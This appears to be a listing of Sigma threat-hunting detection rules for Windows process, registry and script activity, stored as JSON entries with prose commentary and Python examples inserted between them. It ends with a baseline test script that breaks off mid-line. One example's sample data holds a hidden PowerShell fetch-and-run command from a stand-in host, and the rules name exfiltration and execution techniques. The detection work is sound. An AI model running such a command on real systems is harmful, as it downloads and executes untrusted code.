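    """Return (event index, rule name) for every rule that fires on each event."""
    return [(i, name) for i, ev in enumerate(events) for name, fn in RULES.items() if fn(ev)]


if __name__ == "__main__":
    for idx, name in evaluate():
        print(f"event {idx}: {name} -> {EVENTS[idx]['CommandLine']}")
```

Only events 0 and 3 fire. Event 3 is the one worth noting: `taskkill -f -im` uses dashes instead of slashes, which a plain `contains: ' /f '` would miss; the `windash` modifier is what makes the rule cover that spelling, and the same expansion applies to the en dash and em dash variants that some copy-pasted commands carry.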
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_tasklist_basic_execution.yml",
    "content": "title: Suspicious Tasklist Discovery Command\nid: 63332011-f057-496c-ad8d-d2b6afb27f96\nstatus: test\ndescription: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist\nauthor: frack113\ndate: 2021-12-11\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.t1057\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains: 'tasklist'\n        - Image|endswith: '\\tasklist.exe'\n        - OriginalFileName: 'tasklist.exe'\n    condition: selection\nfalsepositives:\n    - Likely from users, administrator and different internal and third party applications.\nlevel: informational\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_webdav_process_execution.yml",
    "content": "title: Process Execution From WebDAV Share\nid: f8de9dd5-7a63-4cfd-9d0c-ae124878b5a9\nstatus: experimental\ndescription: |\n    Detects execution of processes with image paths starting with WebDAV shares (\\\\), which might indicate malicious file execution from remote web shares.\n    Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application.\n    Exploitation attempts against vulnerabilities such as CVE-2025-33053 also involve executing processes from WebDAV paths.\nreferences:\n    - https://research.checkpoint.com/2025/stealth-falcon-zero-day/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-13\ntags:\n    - attack.execution\n    - attack.command-and-control\n    - attack.lateral-movement\n    - attack.t1105\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|startswith: '\\\\\\\\'\n        Image|contains: '\\DavWWWRoot\\'\n    condition: selection\nfalsepositives:\n    - Legitimate use of WebDAV shares for process execution\n    - Known applications executing from WebDAV paths\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_winscp_command_open_ftp.yml",
    "content": "title: FTP Connection Open Attempt Via Winscp CLI\nid: c1477deb-37cf-4439-9ffb-44499acb89d0\nstatus: experimental\ndescription: Detects the execution of Winscp with the \"-command\" and the \"open\" flags in order to open an FTP connection. Akira ransomware was seen using this technique in order to exfiltrate data.\nreferences:\n    - https://blogs.blackberry.com/en/2024/07/akira-ransomware-targets-the-latam-airline-industry\nauthor: frack113\ndate: 2025-10-12\ntags:\n    - attack.exfiltration\n    - attack.t1048\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WinSCP.exe'\n        - OriginalFileName: 'winscp.exe'\n    selection_cmd:\n        CommandLine|contains|windash: '-command'\n        CommandLine|contains|all:\n            - 'open '\n            - 'ftp://' # cover ftp and sftp\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_winscp_portable_execution.yml",
    "content": "title: Winscp Execution From Non Standard Folder\nid: 7674f8ef-7141-4cf0-a311-ee359264c64c\nstatus: experimental\ndescription: Detects the execution of Winscp from a non-standard folder, which could indicate the use of the portable Winscp build.\nreferences:\n    - https://blogs.blackberry.com/en/2024/07/akira-ransomware-targets-the-latam-airline-industry\nauthor: frack113\ndate: 2025-10-12\ntags:\n    - attack.exfiltration\n    - attack.t1048\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\WinSCP.exe'\n        - OriginalFileName: 'winscp.exe'\n    filter_main_location:\n        Image|startswith: 'C:\\Program Files (x86)\\WinSCP\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_wmic_recon_system_info.yml",
    "content": "title: System Information Discovery Via Wmic.EXE\nid: d85ecdd7-b855-4e6e-af59-d9c78b5b861e\nrelated:\n    - id: 9d5a1274-922a-49d0-87f3-8c653483b909\n      type: derived\nstatus: test\ndescription: |\n    Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\n    including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS,\n    and GPU driver products/versions.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic\n    - https://nwgat.ninja/getting-system-information-with-wmic-on-windows/\n    - https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar\n    - https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/\n    - https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/\n    - https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-12-19\nmodified: 2024-01-15\ntags:\n    - attack.discovery\n    - attack.t1082\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_wmic:\n        - Description: 'WMI Commandline Utility'\n        - OriginalFileName: 'wmic.exe'\n        - Image|endswith: '\\WMIC.exe'\n    selection_get:\n        CommandLine|contains: 'get'\n    selection_classes:\n        CommandLine|contains:\n            - 'baseboard'\n            - 'bios'\n            - 'cpu'\n            - 'diskdrive'\n            - 'logicaldisk'\n            - 'memphysical'\n            - 'os'\n            - 'path'\n            - 'startup'\n            - 'win32_videocontroller'\n    selection_attributes:\n        CommandLine|contains:\n            - 'caption'\n            - 'command'\n            - 'driverversion'\n    
        - 'maxcapacity'\n            - 'name'\n            - 'osarchitecture'\n            - 'product'\n            - 'size'\n            - 'smbiosbiosversion'\n            - 'version'\n            - 'videomodedescription'\n    filter_optional_vmtools:\n        ParentCommandLine|contains: '\\VMware\\VMware Tools\\serviceDiscovery\\scripts\\'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - VMWare Tools serviceDiscovery scripts\n# Note: Might be upgraded to a medium detection rules after some time\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml",
    "content": "title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript\nid: 1e33157c-53b1-41ad-bbcc-780b80b58288\nrelated:\n    - id: 23250293-eed5-4c39-b57a-841c8933a57d\n      type: obsolete\n    - id: cea72823-df4d-4567-950c-0b579eaf0846\n      type: derived\nstatus: test\ndescription: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript\nreferences:\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://redcanary.com/blog/gootloader/\nauthor: Michael Haag\ndate: 2019-01-16\nmodified: 2023-05-15\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'wscript.exe'\n              - 'cscript.exe'\n        - Image|endswith:\n              - '\\wscript.exe'\n              - '\\cscript.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '.js'\n            - '.jse'\n            - '.vba'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    condition: all of selection_*\nfalsepositives:\n    - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_wsl_arbitrary_command_execution.yml",
    "content": "title: Arbitrary Command Execution Using WSL\nid: dec44ca7-61ad-493c-bfd7-8819c5faa09b\nrelated:\n    - id: 2267fe65-0681-42ad-9a6d-46553d3f3480 # Generic susp child processes rules\n      type: similar\nstatus: test\ndescription: |\n    Detects potential abuse of the Windows Subsystem for Linux (WSL) binary as a Living Off The Land binary in order to execute arbitrary Linux or Windows commands.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/\n    - https://twitter.com/nas_bench/status/1535431474429808642\nauthor: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-05\nmodified: 2023-04-12\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wsl.exe'\n        - OriginalFileName: 'wsl.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' -e '\n            - ' --exec'\n            - ' --system'\n            - ' --shell-type '\n            - ' /mnt/c' # Path to mounted \"C:\\\" partition (Indication of running Windows binaries via WSL)\n            - ' --user root'\n            - ' -u root'\n            - '--debug-shell'\n    filter_main_kill:\n        # This filter is to handle a FP that occurs when a process is spawned from WSL and then closed by the user\n        # Example would be to open VsCode through its server extension from WSL\n            # GrandparentCommandLine: \"C:\\Users\\XXX\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe\" --ms-enable-electron-run-as-node c:\\Users\\XXX\\.vscode\\extensions\\ms-vscode-remote.remote-wsl-0.72.0\\dist\\wslDaemon.js\n            # ParentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /d /s /c \"C:\\WINDOWS\\System32\\wsl.exe -d Ubuntu-20.04 -e kill 1366\"\n            # CommandLine: C:\\WINDOWS\\System32\\wsl.exe -d Ubuntu-20.04 -e kill 1366\n        ParentImage|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - ' -d '\n            - ' -e kill '\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Automation and orchestration scripts may use this method to execute scripts etc.\n    - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_wusa_cab_files_extraction.yml",
    "content": "title: Cab File Extraction Via Wusa.EXE\nid: 59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9\nrelated:\n    - id: c74c0390-3e20-41fd-a69a-128f0275a5ea\n      type: derived\nstatus: test\ndescription: |\n    Detects execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract CAB files using the \"/extract\" argument, which is no longer supported on current Windows versions.\nreferences:\n    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-04\nmodified: 2024-08-15\ntags:\n    - attack.execution\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\wusa.exe'\n        CommandLine|contains: '/extract:'\n    condition: selection\nfalsepositives:\n    - The \"/extract\" flag still works on older 'wusa.exe' versions, which could be legitimate use (monitor the path of the CAB being extracted)\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/registry/registry_event/registry_event_scheduled_task_creation.yml",
    "content": "title: Scheduled Task Created - Registry\nid: 93ff0ceb-e0ef-4586-8cd8-a6c277d738e3\nstatus: test\ndescription: Detects the creation of a scheduled task via its registry keys in the TaskCache.\nreferences:\n    - https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/\n    - https://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5\nauthor: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team\ndate: 2023-09-27\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.s0111\n    - attack.t1053.005\n    - car.2013-08-001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\'\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\'\n    condition: selection\nfalsepositives:\n    - Likely, as creating scheduled tasks is normal behaviour on Windows\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/registry/registry_set/registry_set_office_trusted_location.yml",
    "content": "title: Microsoft Office Trusted Location Updated\nid: a0bed973-45fa-4625-adb5-6ecdf9be70ac\nrelated:\n    - id: f742bde7-9528-42e5-bd82-84f51a8387d2\n      type: similar\nstatus: test\ndescription: Detects changes to the registry keys related to \"Trusted Location\" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions.\nreferences:\n    - https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-21\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\n    - detection.threat-hunting\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'Security\\Trusted Locations\\Location'\n        TargetObject|endswith: '\\Path'\n    filter_main_office_click_to_run:\n        Image|contains: ':\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_main_office_apps:\n        Image|contains:\n            - ':\\Program Files\\Microsoft Office\\'\n            - ':\\Program Files (x86)\\Microsoft Office\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - During office installations or setup, trusted locations are added, which will trigger this rule.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/registry/registry_set/registry_set_powershell_crypto_namespace.yml",
    "content": "title: Registry Set With Crypto-Classes From The \"Cryptography\" PowerShell Namespace\nid: 1c2a3268-3881-414a-80af-a5b313b14c0e\nstatus: test\ndescription: |\n    Detects a registry value being set under a \"\\Shell\\Open\\Command\" key with PowerShell code that uses classes from the \"System.Security.Cryptography\" namespace.\n    The .NET namespace \"System.Security.Cryptography\", accessible from PowerShell, provides classes for on-the-fly encryption and decryption.\n    These can be used, for example, to decrypt a malicious payload for defense evasion.\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0\n    - https://squiblydoo.blog/2023/11/07/october-2023-solarmarker/\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-12-01\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1059.001\n    - attack.t1027.010\n    - attack.t1547.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_key:\n        TargetObject|contains: '\\Shell\\Open\\Command'\n    selection_value_img:\n        Details|contains:\n            - 'powershell'\n            - 'pwsh'\n    selection_value_namespace:\n        Details|contains: 'System.Security.Cryptography.'\n    selection_value_classes:\n        Details|contains:\n            - '.AesCryptoServiceProvider'\n            - '.DESCryptoServiceProvider'\n            - '.DSACryptoServiceProvider'\n            - '.RC2CryptoServiceProvider'\n            - '.Rijndael'\n            - '.RSACryptoServiceProvider'\n            - '.TripleDESCryptoServiceProvider'\n    condition: all of selection_*\nfalsepositives:\n    - These classes are used legitimately, but less so by parent processes with low prevalence or when the decrypted content lives in temporary folders.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/registry/registry_set/registry_set_runmru_command_execution.yml",
    "content": "title: Command Executed Via Run Dialog Box - Registry\nid: f9d091f6-f1c7-4873-a24f-050b4a02b4dd\nrelated:\n    - id: a7df0e9e-91a5-459a-a003-4cde67c2ff5d\n      type: derived\nstatus: test\ndescription: |\n    Detects execution of commands via the run dialog box on Windows by checking values of the \"RunMRU\" registry key.\n    This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.\nreferences:\n    - https://www.forensafe.com/blogs/runmrukey.html\n    - https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71\n    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/\nauthor: Ahmed Farouk, Nasreddine Bencherchali\ndate: 2024-11-01\ntags:\n    - detection.threat-hunting\n    - attack.execution\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU'\n    filter_main_mrulist:\n        TargetObject|endswith: '\\MRUList'\n    filter_optional_ping:\n        Details|contains: 'ping'\n    filter_optional_generic:\n        Details:\n            - '%appdata%\\1'\n            - '%localappdata%\\1'\n            - '%public%\\1'\n            - '%temp%\\1'\n            - 'calc\\1'\n            - 'dxdiag\\1'\n            - 'explorer\\1'\n            - 'gpedit.msc\\1'\n            - 'mmc\\1'\n            - 'notepad\\1'\n            - 'regedit\\1'\n            - 'services.msc\\1'\n            - 'winver\\1'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
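The RunMRU key the rule above watches is also a forensic artefact in its own right: Explorer stores each command typed into the Run dialog in a one-letter value with a literal `\1` suffix, and the MRUList value holds those letters most-recent-first. The block below is an added example, not code from the Sigma project: it parses a constructed snapshot of that key into chronological order and then applies the rule's value-level exclusions (the `ping` substring and the generic benign values). The 203.0.113.5 URL and the other values are made up, and the rule itself fires on individual registry_set events rather than on a key snapshot, so this only approximates what it would surface.

```python
"""Added example (not Sigma project code): rebuild the order of commands typed
into the Run dialog from the RunMRU values the rule above watches, then apply
the rule's value-level filters. The registry data is constructed, not an export."""

# Explorer stores each typed command in a one-letter value with a literal "\1"
# suffix; MRUList holds those letters, most recently used first.
RUNMRU_SUFFIX = "\\1"

# The rule's filter_optional_generic entries, without the "\1" suffix.
BENIGN_EXACT = {
    "%appdata%", "%localappdata%", "%public%", "%temp%", "calc", "dxdiag", "explorer",
    "gpedit.msc", "mmc", "notepad", "regedit", "services.msc", "winver",
}


def parse_runmru(values):
    """Return [(slot, command), ...] most-recent-first with the suffix stripped.
    Slots absent from MRUList (or a missing MRUList) are appended alphabetically."""
    order = [s for s in values.get("MRUList", "") if s in values]
    order += sorted(s for s in values if s != "MRUList" and s not in order)
    entries = []
    for slot in order:
        raw = values[slot]
        cmd = raw[:-len(RUNMRU_SUFFIX)] if raw.endswith(RUNMRU_SUFFIX) else raw
        entries.append((slot, cmd))
    return entries


def rule_hits(values):
    """Entries the rule would keep: values containing 'ping' and the generic
    benign values are dropped (the MRUList value is never an entry here)."""
    return [(slot, cmd) for slot, cmd in parse_runmru(values)
            if "ping" not in cmd.lower() and cmd.lower() not in BENIGN_EXACT]


# Constructed sample: four commands, slot 'd' is the most recent.
SAMPLE = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "ping 192.0.2.1\\1",
    "c": "powershell -w hidden -c \"iwr http://203.0.113.5/a.ps1 | iex\"\\1",
    "d": "calc\\1",
}

if __name__ == "__main__":
    for slot, cmd in parse_runmru(SAMPLE):
        print(f"{slot}: {cmd}")
    print("would alert on:", rule_hits(SAMPLE))
```

On the sample only the `powershell -w hidden ...` entry survives the filters, which is the pattern the rule's references describe. When triaging a live host, compare the MRUList order with the registry key's last-write time: the most recent slot is the command that produced the event.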
  {
    "path": "rules-threat-hunting/windows/registry/registry_set/registry_set_service_image_path_user_controlled_folder.yml",
    "content": "title: Service Binary in User Controlled Folder\nid: 277dc340-0540-42e7-8efb-5ff460045e07\nrelated:\n    - id: c625c4c2-515d-407f-8bb6-456f65955669\n      type: obsolete\nstatus: test\ndescription: |\n    Detects the setting of the \"ImagePath\" value of a service registry key to a path controlled by a non-administrator user such as \"\\AppData\\\" or \"\\ProgramData\\\".\n    Attackers often use such directories for staging purposes.\n    This rule might also trigger on badly written software: if an attacker can control the binary of an auto-starting service, they might achieve persistence or privilege escalation.\n    Note that while ProgramData is a user controlled folder, software might apply strict ACLs which make its subfolders accessible only to admin users. Remove such folders via filters if you experience a lot of noise.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-05-02\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\n    - detection.threat-hunting\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - 'ControlSet'\n            - '\\Services\\'\n        TargetObject|endswith: '\\ImagePath'\n        Details|contains:\n            - ':\\ProgramData\\'\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n    filter_optional_zoom:\n        TargetObject|contains: '\\Services\\ZoomCptService'\n        Details|contains: 'C:\\Program Files\\Common Files\\Zoom\\Support\\CptService.exe'\n    filter_optional_mbami:\n        TargetObject|contains: '\\Services\\MBAMInstallerService'\n        Details|contains|all:\n            - 'C:\\Users\\'\n            - 'AppData\\Local\\Temp\\MBAMInstallerService.exe'\n    filter_main_windefend:\n        TargetObject|contains:\n            - '\\Services\\WinDefend\\'\n            - '\\Services\\MpKs'\n        Details|contains: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/registry/registry_set/registry_set_shell_context_menu_tampering.yml",
    "content": "title: Shell Context Menu Command Tampering\nid: 868df2d1-0939-4562-83a7-27408c4a1ada\nstatus: test\ndescription: Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands.\nreferences:\n    - https://mrd0x.com/sentinelone-persistence-via-menu-context/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-03-06\ntags:\n    - attack.persistence\n    - detection.threat-hunting\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\Software\\Classes\\'\n            - '\\shell\\'\n            - '\\command\\'\n    condition: selection\nfalsepositives:\n    - Likely from new software installation suggesting to add context menu items. Such as \"PowerShell\", \"Everything\", \"Git\", etc.\nlevel: low\n"
  },
  {
    "path": "tests/check-baseline-local.sh",
    "content": "#!/bin/bash\n\nif [[ -z $(command -v jq) ]]; then\n    >&2 echo \"jq not found. Please install.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nif [[ -z $(command -v wget) ]]; then\n    >&2 echo \"wget not found. Please install.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nif [[ -z $(command -v xargs) ]]; then\n    >&2 echo \"xargs not found. Please install findutils.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nif [[ -z $(command -v tar) ]]; then\n    >&2 echo \"tar not found. Please install.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nif [[ -z $(command -v mktemp) ]]; then\n    >&2 echo \"mktemp not found. Please install coreutils.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nif [[ -z $(command -v realpath) ]]; then\n    >&2 echo \"realpath not found. Please install coreutils.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\nOS=$(uname -s)\n\nif [[ \"${OS}\" != \"Linux\" && \"${OS}\" != \"Darwin\" ]]; then\n    >&2 echo \"This script only supports Linux and MacOS\"\n    >&2 echo \"$(uname -s) is not a supported OS\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\n# Quote $0 so a checkout path containing spaces still resolves correctly\nSCRIPT=\"$(realpath \"$0\")\"\nTOOLS=\"${SCRIPT%/*}\"\nSIGMA=\"${TOOLS%/*}\"\n\ndeclare -A PID2OS\n\nif [[ -n \"$1\" && -d \"$1\" && -r \"$1\" ]]; then\n    RULES=\"$1\"\nelse\n    RULES=\"${SIGMA}\"/rules\nfi\n\nTMP=$(mktemp -d)\nif [[ -z \"${TMP}\" || ! -d \"${TMP}\" || ! -w \"${TMP}\" ]]; then\n    >&2 echo \"Error: Created temporary directory ${TMP} is not writable.\"\n    >&2 echo \"Exiting\"\n    exit 1\nfi\n\n\ncd \"${TMP}\"\n\necho\necho \"Copy rules from ${SIGMA} to ${TMP}\"\ncp -r \"${RULES}\"/windows .\ncp -r \"${SIGMA}\"/rules-emerging-threats .\ncp -r \"${SIGMA}\"/rules-threat-hunting .\necho\necho \"Remove deprecated rules\"\ngrep -ERl \"^status: deprecated\" windows | xargs -r rm -v\necho\necho \"Download evtx-sigma-checker\"\nif [[ \"${OS}\" == \"Linux\" ]]; then\n    wget --no-verbose --progress=bar --show-progress https://github.com/NextronSystems/evtx-baseline/releases/latest/download/evtx-sigma-checker\nelif [[ \"${OS}\" == \"Darwin\" ]]; then\n    wget --no-verbose --progress=bar --show-progress https://github.com/NextronSystems/evtx-baseline/releases/latest/download/evtx-sigma-checker-darwin -O evtx-sigma-checker\nfi\nchmod +x evtx-sigma-checker\necho\n\necho\necho \"Starting EVTX checking in parallel...\"\n\n# Windows 7 32-bit\nOS=\"Windows 7 32-bit\"\n{\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win7-x86.tgz\n    tar xzf win7-x86.tgz\n    echo \"  Checking for Sigma matches in $OS baseline\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path win7_x86/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win7.json\n    echo \"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Windows 2022\nOS=\"Windows 2022\"\n{\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-evtx.tgz\n    tar xzf win2022-evtx.tgz\n    echo \"  Checking for Sigma matches in $OS baseline (this takes around 1 minute)\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path win2022-evtx/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win2022.json\n    echo 
\"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Windows 10\nOS=\"Windows 10\"\n{\n    sleep 10\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win10-client.tgz\n    tar xzf win10-client.tgz\n    echo \"  Checking for Sigma matches in $OS baseline (this takes around 2 minutes)\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path Logs_Client/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win10.json\n    echo \"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Windows 2022 AD\nOS=\"Windows 2022 AD\"\n{\n    sleep 20\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-ad.tgz\n    tar xzf win2022-ad.tgz\n    echo \"  Checking for Sigma matches in $OS baseline (this takes around 2 minutes)\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path Win2022-AD/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win2022-ad.json\n    echo \"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Windows 11\nOS=\"Windows 11\"\n{\n    sleep 30\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win11-client.tgz\n    tar xzf win11-client.tgz\n    echo \"  Checking for Sigma matches in $OS baseline (this takes around 3 minutes)\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path Logs_Win11/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win11.json\n    echo \"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Windows 11 2023\nOS=\"Windows 11 2023\"\n{\n    sleep 40\n    wget --quiet 
https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win11-client-2023.tgz\n    tar xzf win11-client-2023.tgz\n    echo \"  Checking for Sigma matches in $OS baseline (this takes around 3 minutes)\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path Logs_Win11_2023/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win11-2023.json\n    echo \"  Finished Checking for Sigma matches in $OS baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Windows 2022.0.20348 Azure\nOS=\"Windows 2022.0.20348 Azure\"\n{\n    sleep 50\n    wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-0-20348-azure.tgz\n    tar xzf win2022-0-20348-azure.tgz\n    echo \"  Checking for Sigma matches in $OS baseline (this takes around 3 minutes)\"\n    ./evtx-sigma-checker --log-source \"${SIGMA}\"/tests/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings-win2022-0-20348-azure.json\n    echo \"  Finished Checking for Sigma matches in $OS 